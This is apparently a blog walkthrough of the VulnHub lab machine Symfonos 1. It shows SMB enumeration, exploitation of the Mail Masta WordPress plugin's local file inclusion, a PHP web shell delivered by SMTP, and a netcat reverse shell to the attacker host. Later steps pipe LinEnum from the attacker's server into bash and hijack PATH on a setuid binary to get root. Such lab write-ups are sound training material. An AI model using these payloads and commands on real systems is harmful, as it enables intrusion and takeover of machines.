6 July 2022

Pentesting Fun Stuff

following the cyber security path…

Symfonos 1

This VM was recently added to VulnHub and is advertised as a real-life based machine designed to teach an interesting way of obtaining a low-privilege shell. The level is beginner, but as it is the first part of a series I like to do every part.

Enumeration

Starting with a port scan to see which ports are open on the system and what services are running behind them.

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:2A:D4:AA (VMware)
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m57s, deviation: 2h53m12s, median: -2s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2019-08-01T04:16:29-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-08-01 11:16:29
|_  start_date: N/A

These ports are open:

  • port 22, which runs a recent version of OpenSSH
  • port 25, which runs a Postfix SMTP server (the scan shows no version number)
  • port 80, which runs an Apache2 webserver version 2.4.25
  • port 139, NetBIOS session service (Samba smbd 3.x – 4.x)
  • port 445, Samba version 4.5.16-Debian

Webserver

Let’s start with the webserver. The website itself is nothing more than a picture. There is nothing in the source and the picture itself seems to hold no hidden features.

root@cyberspace:~/symfonos1# dirsearch -u http://10.10.10.10 -e html,htm,php,txt -x 403,404 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: html, htm, php, txt | HTTP method: get | Threads: 10 | Wordlist size: 207627

Error Log: /opt/tools/dirsearch/logs/errors-19-08-01_11-38-22.log

Target: http://10.10.10.10

[11:38:22] Starting: 
[11:38:22] 200 -  328B  - /
[11:38:24] 301 -  311B  - /manual  ->  http://10.10.10.10/manual/

Task Completed

Neither dirsearch nor Nikto shows anything interesting. For now, I turn my focus to another port.

Samba

To enumerate an SMB server I use smbmap.

root@cyberspace:~/symfonos1# smbmap -r -H 10.10.10.10
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.10...
[+] IP: 10.10.10.10:445	Name: 10.10.10.10                                       
	Disk                                                  	Permissions
	----                                                  	-----------
	print$                                            	NO ACCESS
	helios                                            	NO ACCESS
	anonymous                                         	READ ONLY
	./                                                 
	dr--r--r--                0 Sat Jun 29 03:14:49 2019	.
	dr--r--r--                0 Sat Jun 29 03:12:15 2019	..
	fr--r--r--              154 Sat Jun 29 03:14:49 2019	attention.txt
	IPC$                                              	NO ACCESS

It looks like there is a document that I can download.

root@cyberspace:~/symfonos1/smb# smbclient \\\\10.10.10.10\\anonymous
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jun 29 03:14:49 2019
  ..                                  D        0  Sat Jun 29 03:12:15 2019
  attention.txt                       N      154  Sat Jun 29 03:14:49 2019

		19994224 blocks of size 1024. 17259504 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 154 as attention.txt (75.2 KiloBytes/sec) (average 75.2 KiloBytes/sec)
smb: \> quit
root@cyberspace:~/symfonos1/smb# cat attention.txt 

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 

Next person I find using one of these passwords will be fired!

-Zeus

That’s a nice hint about certain passwords. Also, the name Zeus could mean the usernames are Greek gods. Let’s put these so-called passwords into a file. One of the shares is called helios. Let’s see if helios also uses a weak password.

root@cyberspace:~/symfonos1# smbclient \\\\10.10.10.10\\helios -U helios
Enter WORKGROUP\helios's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jun 29 02:32:05 2019
  ..                                  D        0  Sat Jun 29 02:37:04 2019
  research.txt                        A      432  Sat Jun 29 02:32:05 2019
  todo.txt                            A       52  Sat Jun 29 02:32:05 2019

		19994224 blocks of size 1024. 17259504 blocks available
smb: \> get research.txt 
getting file \research.txt of size 432 as research.txt (140.6 KiloBytes/sec) (average 140.6 KiloBytes/sec)
smb: \> get todo.txt 
getting file \todo.txt of size 52 as todo.txt (25.4 KiloBytes/sec) (average 94.5 KiloBytes/sec)

Looks like the user ‘helios’ uses one of the weak passwords.

root@cyberspace:~/symfonos1/smb# cat research.txt 
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
root@cyberspace:~/symfonos1/smb# cat todo.txt 

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

Looks like he is working on a folder called /h3l105. Let’s check if this folder exists on the webserver.

WordPress

root@cyberspace:~/symfonos1# dirsearch -u 10.10.10.10/h3l105 -e php -f -x 403,404

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 10301

Error Log: /opt/tools/dirsearch/logs/errors-19-08-01_12-16-51.log

Target: 10.10.10.10/h3l105

[12:16:51] Starting: 
[12:17:03] 301 -    0B  - /h3l105/index.php  ->  http://10.10.10.10/h3l105/
[12:17:03] 301 -    0B  - /h3l105/index.php/  ->  http://10.10.10.10/h3l105/
[12:17:12] 200 -    0B  - /h3l105/wp-content/
[12:17:12] 500 -    3KB - /h3l105/wp-admin/setup-config.php/
[12:17:12] 302 -    0B  - /h3l105/wp-admin/  ->  http://symfonos.local/h3l105/wp-login.php?redirect_to=http%3A%2F%2F10.10.10.10%2Fh3l105%2Fwp-admin%2F&reauth=1
[12:17:12] 200 -    0B  - /h3l105/wp-config.php
[12:17:12] 200 -   69B  - /h3l105/wp-content/plugins/akismet/akismet.php/
[12:17:12] 200 -    1KB - /h3l105/wp-admin/install.php/
[12:17:12] 200 -    1KB - /h3l105/wp-content/uploads/
[12:17:12] 500 -    0B  - /h3l105/wp-includes/rss-functions.php/
[12:17:12] 200 -   44KB - /h3l105/wp-includes/
[12:17:12] 200 -    3KB - /h3l105/wp-login.php/
[12:17:12] 200 -    3KB - /h3l105/wp-login.php
[12:17:12] 405 -   42B  - /h3l105/xmlrpc.php/

Task Completed

Looks like a WordPress site. When running wpscan I get several vulnerabilities and a username (admin).

[+] mail-masta
 | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8609
 |      - https://www.exploit-db.com/exploits/40290/
 |      - https://cxsecurity.com/issue/WLB-2016080220
 |
 | [!] Title: Mail Masta 1.0 - Multiple SQL Injection
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8740
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098
 |      - https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
 |
 | Version: 1.0 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
root@cyberspace:~/symfonos1/web# searchsploit mail masta
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                            |  Path
                                                                                                                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion                                                                                                                    | exploits/php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - SQL Injection                                                                                                                           | exploits/php/webapps/41438.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Here the information about the possible exploits is available. The LFI can be tested easily.

root@cyberspace:~/symfonos1/web# curl -s http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:111::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
helios:x:1000:1000:,,,:/home/helios:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:109:115::/var/spool/postfix:/bin/false

Looks like this works. But for this vulnerability to be useful, I need either files with credentials or to upload a payload that I can trigger.

SMTP

Because of the /etc/passwd file, I know there is a user named helios. I can try to send this user a message through the mail server. The content of this message will be a web shell, which hopefully gives me the opportunity to execute commands through the LFI. Information about web shells is plentiful on the internet. Here is an example.

root@cyberspace:~/symfonos1# nc 10.10.10.10 25
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
HELO
501 Syntax: HELO hostname
MAIL FROM: n0w4n
250 2.1.0 Ok
RCPT TO: helios
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']); ?>
.
250 2.0.0 Ok: queued as A57AF408A1
QUIT
221 2.0.0 Bye

Starting up a listener.

root@cyberspace:~/symfonos1# nc -lvnp 9001
listening on [any] 9001 ...

And now to activate the payload.

root@cyberspace:~/symfonos1# curl -s "http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc 10.10.10.13 9001 -e /bin/bash"
root@cyberspace:~/symfonos1# nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.10.13] from (UNKNOWN) [10.10.10.10] 54432

Escalation of Privileges

id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
python -c 'import pty;pty.spawn("/bin/bash");'
<ml/h3l105/wp-content/plugins/mail-masta/inc/lists$

To do a fast enumeration of the system, I use a shell script called “LinEnum”. To run it on the remote system I start a Python SimpleHTTPServer on my local system and curl the script from the remote system. Because I pipe it to bash, I don’t have to download the file to the system, which would leave traces.

helios@symfonos:/tmp$ curl -s http://10.10.10.13:9002/linenum.sh | bash

There is a lot of information, but the most interesting part is a file with the SUID bit set.

helios@symfonos:/tmp$ find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
< -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42992 Jun  9 16:42 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 440728 Mar  1 10:19 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 59680 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 75792 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40312 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 40504 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 50040 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 8640 Jun 28 20:21 /opt/statuscheck
-rwsr-xr-x 1 root root 44304 Mar  7  2018 /bin/mount
-rwsr-xr-x 1 root root 31720 Mar  7  2018 /bin/umount
-rwsr-xr-x 1 root root 40536 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 61240 Nov 10  2016 /bin/ping

The file of interest is /opt/statuscheck. This is not a well-known SUID file and should be investigated more.

helios@symfonos:/tmp$ file /opt/statuscheck
file /opt/statuscheck
/opt/statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped
helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
HTTP/1.1 200 OK
Date: Thu, 01 Aug 2019 15:28:28 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT
ETag: "148-58c6b9bb3bc5b"
Accept-Ranges: bytes
Content-Length: 328
Vary: Accept-Encoding
Content-Type: text/html

Looks like the output of a curl command.

helios@symfonos:/tmp$ curl -I 10.10.10.10
curl -I 10.10.10.10
HTTP/1.1 200 OK
Date: Thu, 01 Aug 2019 15:30:47 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT
ETag: "148-58c6b9bb3bc5b"
Accept-Ranges: bytes
Content-Length: 328
Vary: Accept-Encoding
Content-Type: text/html

Now to use this to my advantage. For this I will use the PATH variable. First I create a file called curl, because I know that the program statuscheck calls curl, and set all the permission bits on it.

helios@symfonos:/tmp$ echo "/bin/sh" > curl
echo "/bin/sh" > curl
helios@symfonos:/tmp$ chmod 777 curl
chmod 777 curl

Then I prepend /tmp to PATH. When statuscheck runs curl, the folders in PATH are searched in order and the first curl found is executed. Because /tmp is first, my fake curl is the one that gets executed.

helios@symfonos:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH

Then run the program and get root.

helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
# whoami
whoami
root
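
To make the weakness in statuscheck concrete from the defender's side, here is an added example (not the VM's own code) of how a setuid helper should invoke curl so that a user-controlled PATH cannot redirect it. The function names, the directory allowlist and the assumption that statuscheck resolves curl through PATH are mine, not taken from the VM:

```c
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Hardened counterpart to a setuid helper such as /opt/statuscheck (assumed:
 * the original resolves "curl" through PATH, so /tmp placed first in PATH made
 * it run a fake curl as root). Two defences: locate the helper by absolute
 * path, and never inherit the invoking user's environment. */

/* Directories a privileged program may accept in PATH (assumed allowlist). */
static const char *const TRUSTED_DIRS[] = { "/usr/local/sbin", "/usr/local/bin",
    "/usr/sbin", "/usr/bin", "/sbin", "/bin", NULL };

/* Returns 1 if every PATH entry is on the allowlist, else 0. Empty entries
 * ("a::b", leading/trailing ':') and "." mean "current directory": rejected. */
int path_is_trusted(const char *path)
{
    char buf[4096];
    if (path == NULL || *path == '\0') return 0;
    if (path[0] == ':' || path[strlen(path) - 1] == ':' || strstr(path, "::"))
        return 0;
    strncpy(buf, path, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    for (char *p = strtok(buf, ":"); p != NULL; p = strtok(NULL, ":")) {
        int ok = 0;
        for (int i = 0; TRUSTED_DIRS[i] != NULL; i++)
            if (strcmp(p, TRUSTED_DIRS[i]) == 0) ok = 1;
        if (!ok) return 0;
    }
    return 1;
}

/* Runs a program by absolute path with a fixed, minimal environment, so the
 * caller's PATH and LD_* variables never reach it. Returns the child's exit
 * status, or -1 when the path is relative or fork/exec fails. */
int run_with_fixed_env(const char *abs_path, char *const argv[])
{
    char *const env[] = { "PATH=/usr/bin:/bin", NULL };
    int status;
    pid_t pid;
    if (abs_path == NULL || abs_path[0] != '/') return -1;
    if ((pid = fork()) < 0) return -1;
    if (pid == 0) {
        execve(abs_path, argv, env);
        _exit(127);                        /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}

/* What a hardened statuscheck would do: explicit binary, fixed environment,
 * e.g. run_status_check("/usr/bin/curl", "-I", "http://10.10.10.10/").
 * /bin/sh can stand in for curl when checking the environment handling. */
int run_status_check(const char *abs_path, const char *arg1, const char *arg2)
{
    char *const argv[] = { (char *)abs_path, (char *)arg1, (char *)arg2, NULL };
    return run_with_fixed_env(abs_path, argv);
}
```

With this structure the fake curl in /tmp is never consulted: the binary is named by full path and the child only ever sees the fixed PATH.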

Now to finish this challenge.

# cat proof.txt
cat proof.txt

	Congrats on rooting symfonos:1!

                 \ __
--==/////////////[})))==*
                 / \ '          ,|
                    `\`\      //|                             ,|
                      \ `\  //,/'                           -~ |
   )             _-~~~\  |/ / |'|                       _-~  / ,
  ((            /' )   | \ / /'/                    _-~   _/_-~|
 (((            ;  /`  ' )/ /''                 _ -~     _-~ ,/'
 ) ))           `~~\   `\\/'/|'           __--~~__--\ _-~  _/, 
((( ))            / ~~    \ /~      __--~~  --~~  __/~  _-~ /
 ((\~\           |    )   | '      /        __--~~  \-~~ _-~
    `\(\    __--(   _/    |'\     /     --~~   __--~' _-~ ~|
     (  ((~~   __-~        \~\   /     ___---~~  ~~\~~__--~ 
      ~~\~~~~~~   `\-~      \~\ /           __--~~~'~~/
                   ;\ __.-~  ~-/      ~~~~~__\__---~~ _..--._
                   ;;;;;;;;'  /      ---~~~/_.-----.-~  _.._ ~\     
                  ;;;;;;;'   /      ----~~/         `\,~    `\ \        
                  ;;;;'     (      ---~~/         `:::|       `\\.      
                  |'  _      `----~~~~'      /      `:|        ()))),      
            ______/\/~    |                 /        /         (((((())  
          /~;;.____/;;'  /          ___.---(   `;;;/             )))'`))
         / //  _;______;'------~~~~~    |;;/\    /                ((   ( 
        //  \ \                        /  |  \;;,\                 `   
       (<_    \ \                    /',/-----'  _> 
        \_|     \\_                 //~;~~~~~~~~~ 
                 \_|               (,~~   
                                    \~\
                                     ~~

	Contact me via Twitter @zayotic to give feedback!

This was a nice challenge to start with. Because there are two more, Symfonos 2 will be next. Thanks to @zayotic for a fun challenge.
